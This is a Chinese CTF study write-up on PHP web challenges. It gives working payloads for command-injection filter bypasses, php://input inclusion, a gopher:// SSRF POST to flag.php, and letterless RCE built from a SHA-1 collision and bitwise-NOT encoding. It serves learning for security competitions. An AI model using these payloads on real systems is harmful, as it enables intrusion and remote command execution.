CTF比赛训练题目wp复习
最近参加比赛做的题目挺多的,把最近的wp内容进行复习一下
[RoarCTF 2019]Easy Calc1
这道题涉及到了PHP字符串解析特性,现在终于理解之前有一道题遇到的判断变量名为nk_ctf,为什么最后传参总是过不了,后面传的是nk[ctf判断成功,这就是php的字符串解析特性
1)删除空白符
2)将某些字符转换为下划线(包括空格)
可以看到对num进行了检测如果是的话根本不会有命令执行漏洞,但是可以运用这个特性,传一个+num或者是空格num就可以绕过num的检测了,
eval('echo '.$str.';');
这里我觉得需要有必要对eval带两个参数的和eval()进行一些区分和总结因为有点太混乱了这里
接下来就是构造命令来进行查看,显示用var_dump()print_r()啥的都行,当前目录用scandir,屏蔽的/可以用chr(47),查看文件用file_get_content()或者highlight_file()都行
? num=var_dump(scandir(chr(47)))
查看到了根目录下的文件
? num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))
最终获取到flag
phpinfo()界面里发现 allow_url_include on
存在文件包含
php://input
用法: 可以访问请求的原始数据的只读流,将post请求中的数据作为PHP代码执行.
因此可以php://input 来执行post输入流的命令
<?php
if (isset($_GET['file'])) {
if ( substr($_GET["file"], 0, 6) === "php://" ) {
include($_GET["file"]); //危险函数
} else {
echo "Hacker!!!";
}
} else {
highlight_file(__FILE__);
}
?>
Cat的绕过
<?php system("cat /flag");?>
.使用单引号绕过
127.0.0.1; c''at flag_2287214057241.php |base64
4.使用双引号绕过
127.0.0.1; c""at flag_2287214057241.php |base64
5.利用Shell 特殊变量绕过
127.0.0.1; ca$@t flag_2287214057241.php|base64
空格的绕过
发现一个重定向注入,之前不理解的可能就是这个方式
CTFHub 命令注入-综合练习
这里我们可以利用url地址栏来构造payload。
%0a 是 换行符
%09 是 TAB键
于是构造payload:
127.0.0.1%0als
127.0.0.1%0als%09*
tab键可以自动补齐后面的内容ls%09*可查看所有的文件
得到文件flag_167523157129713.php
127.0.0.1%0acd%09*here%0aca''t%09*.php
cat被过滤了,所以用ca’'t来代替
easy_curl
file协议查看index.php和flag.php的源码:
发现对127.0.0.1有过滤,所以改成127.0000.0000.1绕过过滤。
再看一下index.php,这里是用了curl函数来获取并且输出数据,curl可以支持的伪协议有很多,gopher,file,dict,http/s
那么我们可以通过gopher协议,向flag.php传一个post报文,报文里面包含有key,大概内容为
url=gopher://127.0000.0000.1:80/_POST报文内容
构造post
然后这里我们报文内容显示在url上输入,被解码后保存到curl里面,再通过curl输出跳转,又解码了一次,所以我们要对POST报文内容进行两次url编码
在第一次编码要把%0A全部改成%0D0A,%0A是在linux系统中中代表换行符,在windos中是%0D0A代表换行符,但是网上的编码器大都是编码的%0A,所以我们需要改成windos能够识别的
最终payload:
url=gopher%3A//127.0000.0000.1%3A80/_%250D%250APOST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%252080.endpoint-8f55f84e81da413c81d1c6c7191842a9.s.ins.cloud.dasctf.com%253A81%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250A%250D%250Akey%253Da1c5ac62f2623d260841743127bb6631%250D%250A
Nkctf
Eazy_php
观察题目一个一个解析,前面的比较简单直接md5标准绕过,后面遇到了一个sha1绕过,一开始用了数组发现不行,原来是前面string会出现null=null,所以大概知道该怎么做了后面在网上找了很久发现居然真的有这种绕过贴在这里方便以后看,原理不太清楚但是确实可以,后面一步NS_CTF卡了好久传参后面才懂这个涉及到get传参的特殊字符问题,NS[CTF.go才可以正常通过,不然会被转义,最后一步正则检测,是标准的无数字无字母命令执行,后面使用了取反的方式绕过,其实异或也可以但是异或不太懂如何去操作,所以最后用的是取反
这里是最终的payload:
c=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1&d=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1&cmd=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98);
取反代码:
<?php
$a = urlencode(~'cat /flag');
echo $a;
//(~%8C%86%8C%8B%9A%92)((~%9C%9E%8B%DF%D0%99%93%9E%98))
?>
这里就是取反后的
System(“ls”)
(~%8C%86%8C%8B%9A%92)(~%93%8C);
按照相同的规则可以构造出来
System(cat flag)
浙公网安备 33010602011771号